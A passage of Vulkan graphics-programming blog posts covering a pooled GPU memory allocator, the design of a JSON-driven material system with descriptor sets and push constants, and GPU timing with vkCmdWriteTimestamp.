    //the freed bytes leave the running total whether or not the span was merged
    state.memTypeAllocSizes[allocation.type] -= requestedAllocSize;
}

Remember that the Allocation struct needed to have the non rounded-up size so it could bind properly, so the first thing we need to do is get the size of the memory chunk it will take up in one of our pools. After that, it’s just a matter of updating the usage data for the block the allocation came from (I store the block’s index in the id variable of the struct). The logic I’m using to update the layout for the blocks is really simple, and is almost certainly suboptimal in a lot of scenarios, but it works for now and is short enough to paste into a blog post, so I’m going to go with it.

Also important to note: I’m not actually ever freeing memory right now, just reusing pages. In a big kid app, I’d probably need to change that.
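One of the scenarios where the simple logic falls short is fragmentation: it only merges a freed span with a free span that starts right after it, never with one that ends right before it. A sketch of a fuller version is below. It is a swapped-in technique, not what my allocator does: releaseSpan is a hypothetical helper that sorts the free list by offset and merges every pair of touching spans.

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>
#include <vector>

struct OffsetSize { uint64_t offset; uint64_t size; };

// Returns a span to the free list, then merges any spans that touch.
void releaseSpan(std::vector<OffsetSize>& freeSpans, OffsetSize released)
{
    freeSpans.push_back(released);

    std::sort(freeSpans.begin(), freeSpans.end(),
              [](const OffsetSize& a, const OffsetSize& b) { return a.offset < b.offset; });

    std::vector<OffsetSize> merged;
    for (const OffsetSize& span : freeSpans)
    {
        if (!merged.empty() && merged.back().offset + merged.back().size == span.offset)
        {
            merged.back().size += span.size; // touches the previous span: extend it
        }
        else
        {
            merged.push_back(span);
        }
    }
    freeSpans.swap(merged);
}
```

Sorting on every free is not cheap for long free lists, but for a handful of spans per block it keeps the code short, and it guarantees that a fully freed block collapses back into a single span.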

The remaining parts of the AllocatorInterface that the pool allocator implements are as follows:

size_t allocatedSize(uint32_t memoryType)
{
	return state.memTypeAllocSizes[memoryType];
}

uint32_t numAllocs()
{
	return state.totalAllocs;
}

I’m going to go out on a limb and assume these don’t need explanation.

Putting all of this together and re running the MaterialDemo app shows that now I’m only using 4 active allocations to render the frame! That’s a big improvement over the 11 that I needed earlier. Mission success! Mostly…

The Problem Of Mapping Memory

Unfortunately, using the above code, I ended up with the following in my output log:

VkMapMemory: Attempting to map memory on an already-mapped object 0x1a

It appears to be incorrect to map the same VkDeviceMemory block more than once at the same time, even if you’re mapping different regions of the block of memory. This means that the pool allocator needs a bit more information about how we plan to use the memory that we get out of it, to decide whether it needs to put that allocation into its own chunk of memory, or if it can reuse an old one like I did above.

Any allocation that isn’t device local might be mapped at some point, so I decided to simply assume that if an allocation’s memory properties weren’t exactly VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT, I would give it its own allocation. Since the usage flags aren’t part of a standard VkMemoryAllocateInfo, this meant I had to define my own AllocationCreateInfo struct, and modify my AllocatorInterface a bit:

struct AllocationCreateInfo
{
    VkMemoryPropertyFlags usage;
    uint32_t memoryTypeIndex;
    VkDeviceSize size;
};

struct AllocatorInterface
{
    //this was the only function that changed
    void(*alloc)(Allocation&, AllocationCreateInfo);
};

This is probably better long term anyway, because at some point it will likely be handy to be able to pass even more data about how the allocation will be used to the alloc function, and now I have the place to do that.

The changes to the allocator itself are very minimal. First, I added a flag to the DeviceMemoryBlock struct to flag it as “reserved,” that is, not eligible for new allocations even if there is room:

struct DeviceMemoryBlock
{
    Allocation mem;
    std::vector<OffsetSize> layout;
    bool pageReserved;
};

Next, the allocation function needed to be modified to check if an allocation needed a whole page to itself, and to pass that info to the findFreeChunkForAllocation function. This flag forces the find function to return a totally new DeviceMemoryBlock that will fit the allocation.

void alloc(Allocation& outAlloc, AllocationCreateInfo createInfo)
{
    //rest of code omitted for brevity
    bool needsOwnPage = createInfo.usage != VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT;
    bool found = findFreeChunkForAllocation(location, memoryType, requestedAllocSize, needsOwnPage);
    //...
}

Then, after either finding or creating a memory block to use, the allocation function marks that DeviceMemoryBlock as reserved:

pool.blocks[location.blockIdx].pageReserved = needsOwnPage;

Finally, the free function had to be modified to mark any DeviceMemoryBlock that it’s freeing memory from as not reserved:

void free(Allocation& allocation)
{
    //rest of code omitted for brevity
    MemoryPool& pool = state.memPools[allocation.type];
    pool.blocks[allocation.id].pageReserved = false;
    //...
}
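To make the three changes above a bit more concrete, here is a minimal, Vulkan-free sketch of the same idea. Everything in it is a stand-in I made up for illustration: Pool, Block, BLOCK_SIZE and the simple bump-style placement are assumptions, not the allocator from the repo, and DEVICE_LOCAL_BIT just mirrors the value of VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Stand-in for VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT (0x1 in the Vulkan headers).
constexpr uint32_t DEVICE_LOCAL_BIT = 0x1;
// Hypothetical page size, chosen only to keep the example small.
constexpr uint64_t BLOCK_SIZE = 1024;

struct Block
{
    uint64_t used = 0;          // bytes handed out so far (simple bump placement)
    bool pageReserved = false;  // true: never share this block with another allocation
};

struct Location
{
    uint32_t blockIdx;
    uint64_t offset;
};

struct Pool
{
    std::vector<Block> blocks;

    Location alloc(uint32_t usage, uint64_t size)
    {
        assert(size <= BLOCK_SIZE);

        // Anything that isn't exactly device local might get mapped later,
        // so it gets a whole block to itself.
        const bool needsOwnPage = usage != DEVICE_LOCAL_BIT;

        if (!needsOwnPage)
        {
            for (uint32_t i = 0; i < blocks.size(); ++i)
            {
                Block& b = blocks[i];
                if (!b.pageReserved && b.used + size <= BLOCK_SIZE)
                {
                    Location loc{ i, b.used };
                    b.used += size;
                    return loc;
                }
            }
        }

        // No shareable block found (or sharing isn't allowed): make a new one.
        Block fresh;
        fresh.used = size;
        fresh.pageReserved = needsOwnPage;
        blocks.push_back(fresh);
        return Location{ static_cast<uint32_t>(blocks.size() - 1), 0 };
    }
};
```

In this toy version, two device-local allocations land in the same block, while anything with other property flags always ends up alone at offset 0 of a fresh block, which is what keeps two mapped allocations from ever sharing a block.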

With all that in place, I ran the MaterialDemo again, and at long last, got the thing to run with no errors, and only 4 allocations, which means I’m calling work on this done for now.

Wrap Up

I’m really glad that I decided to dig into this rather than just grab GPUOpen’s allocator. I learned a ton about Vulkan memory that I’m quite positive I never would have learned otherwise. As mentioned many times, all the code for this is available on github.

As per usual, I’m sure I’m doing a hundred different dumb things in this article, and I’d love you to send me a message on Twitter, or @Khalladay on Mastodon if you spot one of them (or want to say hi).

Tune in next time when I try to finally add instances to the material system!

Lessons Learned While Building a Vulkan Material System

2017-11-27T00:00:00+00:00

One of the things I’m noticing about learning Vulkan, is that there isn’t a lot of material out there to bridge the gap between being a complete beginner, and being able to build your own real applications.

I didn’t realize how big this gap was until I decided to start my next Vulkan project by building a material system. It was supposed to just be the first step in something bigger, but I realized pretty quickly that I didn’t know nearly enough to even get this small piece done. So I scrapped my loftier plans, and decided to split building the material system up into two parts. The first phase (which is the part I have done) was to simply load materials from a file which specified which shaders to use, and which default values to use for their inputs. To keep things simple, I’ve so far always been loading the material onto a full screen quad.

The second phase will be to extend the system to handle material instances, and thousands of objects, but before I dive into that, it felt like a good time to take a step back and write down some of the things I’ve had to figure out to get this far, in case someone else gets stuck in the same places.

One of my tests was Inigo Quilez's raymarching primitives shader

This post is going to jump around a little bit, as you’ll notice by the headings. Some things I want to share are just things I didn’t realize about how to use the Vulkan API, some are “good ideas” that are working out for me so far, and finally I want to write a bit about the high level structure of how my material system works.

All the code for everything is on github, and I’ve tried to add helpful comments to material_creation.cpp, which contains most of the stuff I’m talking about here. Standard caveats to everything: I barely know what I’m doing, there’s probably better ways to do this, I’m not a lawyer, yadda yadda yadda.

How Descriptor Sets (and Bindings!) Work

The first thing that I really needed to get a handle on was how descriptor sets work in Vulkan GLSL. It’s easy enough to look at the syntax and realize that they’re a method for grouping shader inputs and move on, but there’s a bit more to them than that.

For one, Vulkan shaders aren’t namespaced, so Descriptor Set 0 in your vertex shader, is Descriptor Set 0 in your fragment shader (or any other stage you’re using in your material). This also means that a single descriptor set can have bindings that exist in different shader stages, but still all belong to the same set. Even more fun, since the SPIR-V compiler will (likely) remove any variables not in use by your shader, your shader stages may all have the same Descriptor Set Binding in them, and see different versions of that binding.

Let me show you what I mean. If you have a vertex shader that uses descriptor set 0, binding 0, to hold some global information:

layout(binding = 0, set = 0)uniform GLOBAL_DATA
{
    float time;
    vec2 mouse;
}global;

But your actual shader code only ever uses the time member of the GLOBAL_DATA uniform, the compiler will optimize away the mouse member var entirely. However, your fragment shader might also need access to global data, and if it uses the mouse data, and not the time data, it won’t even know that set 0, binding 0 has the time member in it.

To keep everyone on the same page despite this, data about the size of the overall uniform is still there (that is, the size of the struct with ALL members, including compiled out ones, present), along with information about the offset into the struct that a member sits at. So your fragment shader, which only knows about mouse data, will still know that the GLOBAL_DATA uniform is 32 bytes large, and the mouse data is offset 16 bytes from the start of the uniform buffer. With this information, it doesn’t matter which member vars each stage sees.

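Note that uniform block members follow the std140 layout rules by default in Vulkan GLSL, which leaves many of them (vec3s, vec4s, matrix columns, array elements) 16 byte aligned; more on that later.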
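Since every stage reports the full block size and the real offsets of whatever members it kept, per-stage reflection data can be merged back into one picture of the binding. Here is a rough sketch of that merge. The types and the mergeStage function are hypothetical (they are not from material_creation.cpp), and the 0 byte offset / 4 byte size for time used in the example values is my assumption; the 32 byte block and the mouse offset of 16 are the numbers quoted above.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <string>

struct MemberInfo
{
    uint32_t offset;
    uint32_t size;
};

// What a single shader stage reports for one (set, binding) pair.
struct BlockReflection
{
    uint32_t blockSize = 0;                     // size of the WHOLE block, compiled-out members included
    std::map<std::string, MemberInfo> members;  // only the members this stage actually kept
};

// Folds one stage's view of a block into the combined view.
// Returns false if the stages disagree about the block size or about
// where a shared member lives, which would mean they are not really
// describing the same block.
bool mergeStage(BlockReflection& combined, const BlockReflection& stage)
{
    if (combined.blockSize != 0 && combined.blockSize != stage.blockSize)
    {
        return false;
    }
    combined.blockSize = stage.blockSize;

    for (const auto& m : stage.members)
    {
        auto it = combined.members.find(m.first);
        if (it != combined.members.end() &&
            (it->second.offset != m.second.offset || it->second.size != m.second.size))
        {
            return false;
        }
        combined.members[m.first] = m.second;
    }
    return true;
}
```

Merging a vertex stage that only sees time with a fragment stage that only sees mouse gives a combined block that knows about both members, at the offsets each stage reported.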

Use Descriptor Sets To Group Inputs By Update Frequency

You can’t bind an individual set binding in a command buffer, you have to bind an entire descriptor set at once, and binding a descriptor set is a performance heavy operation. What you should do (at least according to NVidia’s Article), is use your descriptor sets to group shader inputs by how frequently they need to be swapped out. Once a descriptor set is bound, it stays bound for the duration of that command buffer, until something else gets bound to that set index. So if everything uses the same set 0, you can bind it once and never pay the cost to bind that again (until next frame).

In my project, I chose set 0 to store Global data which all shaders can access, which will get bound at the beginning of a frame and stay bound while rendering everything, left set 1 alone for a future experiment, and used sets 2 and 3 for data which can change on a per material / per material instance basis. Set 2 is for data which will get set when a material or instance is first loaded and then never changed (like the albedo texture of a character), while set 3 is for shader inputs that can be manipulated at runtime.

An example of how this might play out:

for each view {
  bind global resources           // set 0

  for each shader {
    bind shader pipeline  
    for each material {
      bind material resources  // sets 2,3
    }
  }
}

Obviously this is a pretty simple rendering model, but it’s good enough for this stage of my material system’s life.

Technically speaking, sets 2 and 3 could be one set, but having a separation between static and dynamic data made sense to me, since I have to keep around a lot more information about the dynamic data to facilitate updating it later, but time will tell if this is a good idea or not. I think it largely depends on if there’s a higher cost associated with binding multiple descriptor sets in one call to vkCmdBindDescriptorSets.

VkDescriptorPools Can Store Descriptors of Different Types

This is pretty obvious if you’re reading the actual API docs, but when I started this, most of my information was coming from tutorials like vulkan-tutorial.com, which never explicitly points out that your descriptor pools don’t have to be segregated by descriptor type. You can store uniform buffers, combined image samplers, dynamic buffers, the whole shebang in the same pool.

Getting Arbitrary Descriptor Set Layouts

The last three points were more about general Vulkan knowledge, but the rest are all about implementation details.

The most obvious problem with building a generic material loading system in Vulkan vs OpenGL is the lack of shader reflection available at runtime. In OpenGL all this functionality was there by default, but in Vulkan we need to use the wonderful SPIR-V Cross library to help us get at this information.

I didn’t want to embed SPIR-V Cross in my runtime application, since it felt like unnecessary bloat, so I wrote a separate application that I called the “ShaderPipeline” (also available on github). This program runs whenever a shader has been edited, and handles compiling GLSL into SPIR-V, and creating json files (.refl files) that store reflection information about these shaders.

One of these .refl files might look like the following:

{
    "descriptor_sets": [
        {
            "set": 0,
            "binding": 0,
            "name": "GLOBAL_DATA",
            "size": 32,
            "type": "UNIFORM",
            "members": [
                {
                    "name": "mouse",
                    "size": 16,
                    "offset": 16
                }
            ]
        }
    ],
    "global_sets": [
        0
    ],
    "static_sets": [],
    "dynamic_sets": [],
    "static_set_size": 0,
    "dynamic_set_size": 0,
    "num_static_uniforms": 0,
    "num_static_textures": 0,
    "num_dynamic_uniforms": 0,
    "num_dynamic_textures": 0
}

You’ll notice that at the end I have some extra data about which descriptor sets are global, dynamic, or static, and how many of each type we have. This information is obviously not technically necessary, but this way I can decide to change which sets belong to which category at the ShaderPipeline level instead of the runtime application, and having the counts available was just handier than counting them later.

Fill Gaps In Your VkDescriptorSetLayout Array With Empty Elements

This one definitely threw me for a while until I figured out what to do, since it’s not something that I saw in any tutorial or example code before trying this project out.

One of the first things you need to do when you’re creating your material is to make VkDescriptorSetLayouts for each descriptor set in use by the shaders in your material. Eventually, you use this array of VkDescriptorSetLayouts as part of your VkPipelineLayoutCreateInfo struct. One thing you may have noticed is that a VkDescriptorSetLayoutCreateInfo struct doesn’t have any spot for specifying which set that layout is for. This means the api assumes that the array of VkDescriptorSetLayouts that you use is a contiguous collection of sets - that is - if your array is 3 elements long, it is for sets 0, 1, and 2.

In practice, you’ll likely have gaps in the sets that your shaders use, especially if you assign each set number a specific use case, like I did above. In this case, you need to make a VkDescriptorSetLayout for each set you aren’t using as well. These “empty” elements will have their binding count set to 0, and their pBindings array set to null, but still need to be in your final array of set layouts, or else nothing is going to work right.
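As a sketch of the gap filling step, here is a small function that turns a sparse map of "set index to bindings" into a dense array with empty entries for the unused sets. To keep it compilable without the Vulkan headers, BindingDesc and SetLayoutInfo are stand-ins I invented for VkDescriptorSetLayoutBinding and the bindingCount / pBindings fields of VkDescriptorSetLayoutCreateInfo; buildDenseSetLayouts is a hypothetical name too.

```cpp
#include <cassert>
#include <cstdint>
#include <map>
#include <vector>

// Stand-in for VkDescriptorSetLayoutBinding.
struct BindingDesc
{
    uint32_t binding;
};

// Stand-in for the two relevant fields of VkDescriptorSetLayoutCreateInfo.
struct SetLayoutInfo
{
    uint32_t bindingCount = 0;
    const BindingDesc* pBindings = nullptr;
};

// Builds one entry per set index from 0 up to the highest set in use.
// Sets that no shader uses keep bindingCount == 0 and pBindings == nullptr.
// The returned entries point into usedSets, so it must outlive the result.
std::vector<SetLayoutInfo> buildDenseSetLayouts(
    const std::map<uint32_t, std::vector<BindingDesc>>& usedSets)
{
    std::vector<SetLayoutInfo> layouts;
    if (usedSets.empty())
    {
        return layouts;
    }

    const uint32_t highestSet = usedSets.rbegin()->first;
    layouts.resize(highestSet + 1);  // default constructed == "empty" layout

    for (const auto& entry : usedSets)
    {
        SetLayoutInfo& info = layouts[entry.first];
        info.bindingCount = static_cast<uint32_t>(entry.second.size());
        info.pBindings = entry.second.empty() ? nullptr : entry.second.data();
    }
    return layouts;
}
```

With shaders that only use sets 0 and 2, this produces three entries, and the middle one is the empty placeholder for set 1. In the real thing, each entry would then go through vkCreateDescriptorSetLayout before being handed to the pipeline layout.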

If you’re manually specifying a struct that maps to a set, alignment matters

To keep things simple, I’m keeping my global data as a mapped struct, since I’m assuming (hoping?) that because it’s not a lot of data, and it only gets updated once a frame, there won’t be much of a performance penalty (this is untested right now though, so… ymmv).

When I first set this up, I defined my struct like so:

struct GlobalShaderData
{
    glm::float32 time;
    glm::vec4 mouse;
    glm::vec2 resolution;
    glm::mat4 viewMatrix;
    glm::vec4 worldSpaceCameraPos;
};

and this compiled and ran…sorta. Data was getting sent to the gpu, but the wrong data seemed to be filling the variables in the shader. Turns out, this is because (as mentioned earlier) uniform struct members are 16 byte aligned in Vulkan.

Awkwardly, fixing this problem in MSVC looks like this:

struct GlobalShaderData
{
    __declspec(align(16)) glm::float32 time;
    __declspec(align(16)) glm::vec4 mouse;
    __declspec(align(16)) glm::vec2 resolution;
    __declspec(align(16)) glm::mat4 viewMatrix;
    __declspec(align(16)) glm::vec4 worldSpaceCameraPos;
};

I’m about 110% positive there’s a less awful way of doing this, so please, please let me know what it is on Twitter.
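One candidate, offered as a sketch rather than something tested in this project: C++11’s alignas specifier is the standard spelling of __declspec(align(16)), and a few static_asserts can check that the CPU struct really has the offsets the shader expects. Vec2, Vec4 and Mat4 below are stand-ins for the glm types so the snippet compiles on its own (I’m assuming tightly packed floats, like glm’s defaults), and the expected offsets are what the std140 rules give for this particular set of members.

```cpp
#include <cassert>
#include <cstddef>

// Stand-ins for glm::vec2, glm::vec4 and glm::mat4.
struct Vec2 { float x, y; };
struct Vec4 { float x, y, z, w; };
struct Mat4 { float m[16]; };

struct GlobalShaderData
{
    alignas(16) float time;
    alignas(16) Vec4 mouse;
    alignas(16) Vec2 resolution;
    alignas(16) Mat4 viewMatrix;
    alignas(16) Vec4 worldSpaceCameraPos;
};

// If someone adds or reorders a member, these fail at compile time
// instead of silently feeding the shader garbage.
static_assert(offsetof(GlobalShaderData, time) == 0, "time offset");
static_assert(offsetof(GlobalShaderData, mouse) == 16, "mouse offset");
static_assert(offsetof(GlobalShaderData, resolution) == 32, "resolution offset");
static_assert(offsetof(GlobalShaderData, viewMatrix) == 48, "viewMatrix offset");
static_assert(offsetof(GlobalShaderData, worldSpaceCameraPos) == 112, "worldSpaceCameraPos offset");
static_assert(sizeof(GlobalShaderData) == 128, "block size");
```

Padding every member to 16 bytes happens to line up with std140 for this struct, but std140 alignment actually varies by type (a vec2 only needs 8 bytes, for example), so the static_asserts are the part doing the real work here.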

That’s the end of the “potentially helpful to everyone” segment of the post, if you want to know more about the structure of my material system so far, read on!

My Ugly Little Material System

To preface: I’m going to include more information than anyone needs, because I wish implementation details about how someone else had approached this problem were readily available to me before I started on this path.

As I mentioned earlier, my system works in two passes. The first pass, called the “ShaderPipeline”, is an application that gets run whenever a shader is modified. This handles compiling GLSL into SPIR-V, and generates the reflection files I talked about earlier.

Materials are defined in their own json files (I don’t love json, but rapidjson is really easy to use), which specify which shaders to use for each stage, and default values for their inputs. A simple material might look like this:

{
  "shaders":
  [
    {
      "stage": "vertex",
      "shader": "vertex_uvs",
      "defaults":
      [
        {
          "name":"Instance",
          "members":
          [
            {
              "name": "tint",
              "value": [0.0, 1.0, 1.0, 1.0]
            }
          ]
        }
      ]
    },
    {
      "stage": "fragment",
      "shader": "fragment_passthrough",
      "defaults":
      [
        {
          "name": "texSampler",
          "value":"../data/textures/airplane.png"
        }
      ]
    }
  ]
}

When a material is loaded from a file, this material file is unpacked into a Material::Definition struct, which is formatted to make it easy to access the data we need when creating the vulkan material. Below is what that struct looks like, but if you want to know what the custom types inside it are (like PushConstantBlock), go check out material_creation.h

struct Definition
{
  PushConstantBlock pcBlock;
  std::vector<ShaderStageDefinition> stages;
  std::map<uint32_t, std::vector<DescriptorSetBinding>> descSets;

  std::vector<uint32_t> dynamicSets;
  std::vector<uint32_t> staticSets;
  std::vector<uint32_t> globalSets;

  uint32_t numStaticUniforms;
  uint32_t numStaticTextures;
  uint32_t numDynamicUniforms;
  uint32_t numDynamicTextures;
  uint32_t staticSetsSize;
  uint32_t dynamicSetsSize;
};

The Material::Definition struct is what gets passed to the material creation function. If you really wanted to, you could create a definition at runtime and make new materials on the fly. I’m sure at some point I’ll think of a clever reason to do that.

The advantage of this Material::Definition struct is that it’s trivial to add more information to it. If I wanted my material json files to specify blend mode, ZWrite behaviour, Culling Mode, Polygon Mode, or anything else, I can just add a field to this and grab it out of the json. For now, the creation method just assumes I want an opaque, ZWriting, Cull Back, Polygon Filled material, but that will be made configurable pretty much as soon as I want to have a translucent material.

Once loaded, all the data needed to render a material is stored in a MaterialRenderData struct:

struct MaterialRenderData
{
  //general material data
  VkPipeline pipeline;
  VkPipelineLayout pipelineLayout;

  uint32_t layoutCount;
  VkDescriptorSetLayout* descriptorSetLayouts;

  VkDescriptorSet* descSets;
  uint32_t numDescSets;

  UniformBlockDef pushConstantLayout;
  char* pushConstantData;

  //we don't need a layout for static data since it cannot be
  //changed after initialization
  VkBuffer* staticBuffers;
  VkDeviceMemory staticUniformMem;
  uint32_t numStaticBuffers;

  //for now, just add buffers here to modify. when this
  //is modified to support material instances, we'll change it
  //to something more sane.
  MaterialDynamicData dynamic;
};

There are a few things to talk about here. Firstly, I store the data used for a material’s push constants in the RenderData struct, so that if nothing has changed since the last time they were set, we have that data already sorted out. Rather than store each of the push constant members in a map, or other collection, I keep all the data for the entire push constant block in a char* buffer, and then store layout data about that char* in a UniformBlockDef struct, which looks like this:

struct UniformBlockDef
{
  //stride 2 - hashed name / member offset
  uint32_t* layout;
  uint32_t blockSize;
  uint32_t memberCount;
  VkShaderStageFlags visibleStages;
};

As the comment says, instead of storing string names for the member vars, I hash them and store them along with each member’s offset into the buffer.

Setting a push constant value on a material then becomes a simple matter of looping over this layout buffer until you find the member you want, and using the offset data located next to it:

void setPushConstantData(uint32_t matId, const char* var, void* data, uint32_t size)
{
  MaterialRenderData& rData = Material::getRenderData(matId);

  uint32_t varHash = hash(var);

  for (uint32_t i = 0; i < rData.pushConstantLayout.memberCount * 2; i += 2)
  {
    if (rData.pushConstantLayout.layout[i] == varHash)
    {
      uint32_t offset = rData.pushConstantLayout.layout[i + 1];
      memcpy(rData.pushConstantData + offset, data, size);
      break;
    }
  }
}

Then when it’s time for that material to be rendered, I can just grab the entire buffer of push constant data and send it on its way.

I like this approach to the problem because it makes Push Constant members (and other dynamic data, which uses a similar paradigm) “fire and forget” data, that is, nothing blows up if I try to set a push constant var on a material that doesn’t have that member, the function just doesn’t find the member in the layout buffer and does nothing. It ends up working very much like the functions for setting shader inputs on Unity’s Material class.
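Here is a self-contained toy version of that hashed layout lookup, for anyone who wants to poke at the idea outside of the renderer. The hash is FNV-1a, which I picked purely as a stand-in (the snippets above don’t show which hash function is used), and BlockLayout / setMember are made-up names. It also adds a bounds check that the snippet above doesn’t have.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// FNV-1a string hash, used here only as a stand-in for hash().
inline uint32_t fnv1a(const char* str)
{
    uint32_t h = 2166136261u;
    for (; *str != '\0'; ++str)
    {
        h ^= static_cast<uint8_t>(*str);
        h *= 16777619u;
    }
    return h;
}

struct BlockLayout
{
    std::vector<uint32_t> layout;  // stride 2: hashed name / member offset
    std::vector<char> data;        // raw bytes for the whole block
};

// Copies size bytes into the named member. Returns false (and touches
// nothing) when the block has no such member or the write wouldn't fit,
// which is what makes the calls "fire and forget".
bool setMember(BlockLayout& block, const char* name, const void* src, uint32_t size)
{
    const uint32_t nameHash = fnv1a(name);

    for (size_t i = 0; i + 1 < block.layout.size(); i += 2)
    {
        if (block.layout[i] == nameHash)
        {
            const size_t offset = block.layout[i + 1];
            if (offset + size > block.data.size())
            {
                return false;
            }
            std::memcpy(block.data.data() + offset, src, size);
            return true;
        }
    }
    return false;
}
```

Setting a member that exists overwrites just its slice of the byte buffer, and setting one that doesn’t exist quietly returns false.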

I use this same paradigm to handle setting dynamic uniform data, although in that case I have to call vkCmdUpdateBuffer instead of just memcpying, since I have to update device local memory. This could probably be sped up by collecting all the updates for a frame and then doing the vulkan update once, but I’ll worry about that in phase 2. Dynamic uniforms also need a bit more information stored about them, so I have a separate struct, called MaterialDynamicData to store that:

struct MaterialDynamicData
{
  uint32_t numInputs;

  // stride: 4 - hashed name / buffer index / member size / member offset
  // for images- hashed name / textureViewPtr index / desc set write idx / padding
  uint32_t* layout;
  VkBuffer* buffers;
  VkDeviceMemory uniformMem;

  VkWriteDescriptorSet* descriptorSetWrites;
};

The big difference between this and the push constant data is that I’m also keeping the VkWriteDescriptorSet structs around, so that I can change what textures are being used at runtime, and the layout buffer is storing more information per member, but it’s all pretty much working the same way as the push constants.

These MaterialRenderData structs are stored in a map (boo!) that uses uint32_ts as keys. When the renderer wants to get the information about a mesh’s material, it uses the integer material name to get the corresponding struct, and Bob’s your uncle.

Problems and Limitations With My System

Oh boy, there’s a lot of them. Probably the biggest being that none of it has actually survived being used in a real project, but I suppose there’s some more specific things to point out.

Number one is that storing the VkDeviceMemory directly in the material is probably bad, and should likely be replaced by an actual allocator doing actual allocator things.

Secondly, as mentioned before, this doesn’t handle material instances at all yet, so if you want two materials, using the same shaders but a different texture, you need two whole materials to do it. Phase 2 of this project will remedy that, and add some more customization options to the Material::Definition struct.

All my materials are stored in maps, and setting any data on them requires a map lookup to get the MaterialRenderData struct for that material. This results in a LOT of unnecessary map lookups. Looking up materials by id is going to happen an awful lot, and I’m not thrilled about using a map at all (but it was easy!). Instead, this should probably do something like store materials in an array, use the integer id to store an index into the array and some additional data to handle when an array slot gets re-used (like Bitsquid does with their ECS).
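A rough sketch of what that array-plus-extra-data idea could look like: each slot carries a generation counter that gets bumped when the slot is freed, so an old handle pointing at a re-used slot can be detected. This is only in the spirit of the index/generation scheme mentioned above; MaterialHandle and SlotArray are names I invented, and none of this exists in the repo.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

struct MaterialHandle
{
    uint32_t index;       // which array slot
    uint32_t generation;  // which "life" of that slot the handle belongs to
};

template <typename T>
class SlotArray
{
public:
    MaterialHandle insert(const T& value)
    {
        uint32_t index;
        if (!freeList.empty())
        {
            index = freeList.back();  // re-use a freed slot
            freeList.pop_back();
        }
        else
        {
            index = static_cast<uint32_t>(slots.size());
            slots.push_back(Slot{});
        }
        slots[index].value = value;
        slots[index].alive = true;
        return MaterialHandle{ index, slots[index].generation };
    }

    void remove(MaterialHandle h)
    {
        if (!isValid(h)) return;
        slots[h.index].alive = false;
        ++slots[h.index].generation;  // invalidates every outstanding handle
        freeList.push_back(h.index);
    }

    bool isValid(MaterialHandle h) const
    {
        return h.index < slots.size()
            && slots[h.index].alive
            && slots[h.index].generation == h.generation;
    }

    // Plain array indexing plus one comparison, no map lookup.
    T* get(MaterialHandle h)
    {
        return isValid(h) ? &slots[h.index].value : nullptr;
    }

private:
    struct Slot
    {
        T value{};
        uint32_t generation = 0;
        bool alive = false;
    };

    std::vector<Slot> slots;
    std::vector<uint32_t> freeList;
};
```

The trade-off versus the map is that handles become two integers instead of one, but a lookup turns into an index and a compare.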

It also should probably support hot reloading of shaders to make editing easier, maybe I should add a phase 3?

Regardless, hopefully this article was helpful to someone! If you want to say hi / want to point out something dumb I’m doing, give me a shout on Twitter, or @Khalladay on Mastodon.

Improving Vulkan Breakout

2017-08-30T00:00:00+00:00

There are lots of reasons why I love the internet, but one of the big ones is that it gives me a way to learn from folks that I would never get to interact with in real life.

Two weeks ago I posted about Comparing Uniform Data Transfer Methods In Vulkan, and immediately got a bunch of great suggestions from Twitter (thanks @SaschaWillems2!), and from reddit on how I could improve things. There was enough there that I thought it warranted revisiting my Breakout clone to test out some new ideas.

Me irl

The main pieces of feedback were:

vkCmdWriteTimestamp could be used to get more fine grained timing data
I really didn’t need to be using _aligned_malloc with my dynamic uniform buffer approach
It might be faster to use device-local memory
With the approaches that don’t use push-constants, it might be faster to re-use command buffers instead of creating them every frame

It all sounded like great advice to me, so I decided to try out each point listed above, to see if the conclusions drawn in the first post are still valid.

Starting from the top:

Use vkCmdWriteTimestamp

I loved this bit of feedback, because it gave me another tool to use to do performance testing! Especially because before hearing about this bit of the api, I had no idea how to profile the performance of a specific chunk of a command buffer.

vkCmdWriteTimestamp writes its timing data into a query, and queries live in a VkQueryPool. So the first step to getting timing data from vulkan is to create one of those:

VkQueryPoolCreateInfo createInfo = {};
createInfo.sType = VK_STRUCTURE_TYPE_QUERY_POOL_CREATE_INFO;
createInfo.pNext = nullptr;
createInfo.queryType = VK_QUERY_TYPE_TIMESTAMP;
createInfo.queryCount = 2;

VkResult res = vkCreateQueryPool(device, &createInfo, nullptr, &queryPool);
assert(res == VK_SUCCESS);

Since I only want to time the part of the rendering pipeline that changes between each uniform data implementation, I only need to allocate 2 queries - one to store the timestamp immediately before the block I’m timing executes, and one to store the timestamp after it’s done.

With that done, all that’s left is to add the appropriate calls to the draw function:

//abbreviated code

vkBeginCommandBuffer(commandBuffer, &beginInfo);
vkCmdResetQueryPool(commandBuffer, queryPool, 0, 2);

//more set up code... (omitted for brevity)

//the block we want to time starts here
vkCmdWriteTimestamp(commandBuffer, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, queryPool, 0);

for (int i = 0; i < PRIM_COUNT; ++i)
{
    //per primitive logic that we want to time
}
vkCmdWriteTimestamp(commandBuffer, VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT, queryPool, 1);

As you may have noticed, vkCmdWriteTimestamp takes a pipeline stage as one of its arguments. This was unintuitive for me, but here’s what the docs say about it:

“vkCmdWriteTimestamp latches the value of the timer when all previous commands have completed executing as far as the specified pipeline stage, and writes the timestamp value to memory. When the timestamp value is written, the availability status of the query is set to available.”

What it seems like this means (correct me if I’m wrong, internet), is that if you pass VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT to this function, you get the timestamp of when all the commands submitted to the command buffer BEFORE you call vkCmdWriteTimestamp have completed executing, whereas if you pass, for instance VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, you’d get the timestamp of when the commands before the timestamp call started execution.

Assuming that’s the case, then in order to measure just the execution of our loop in the above example, both calls to vkCmdWriteTimestamp need to be passed the VK_PIPELINE_STAGE_BOTTOM_OF_PIPE_BIT to get just the timing info for the code between the two calls.
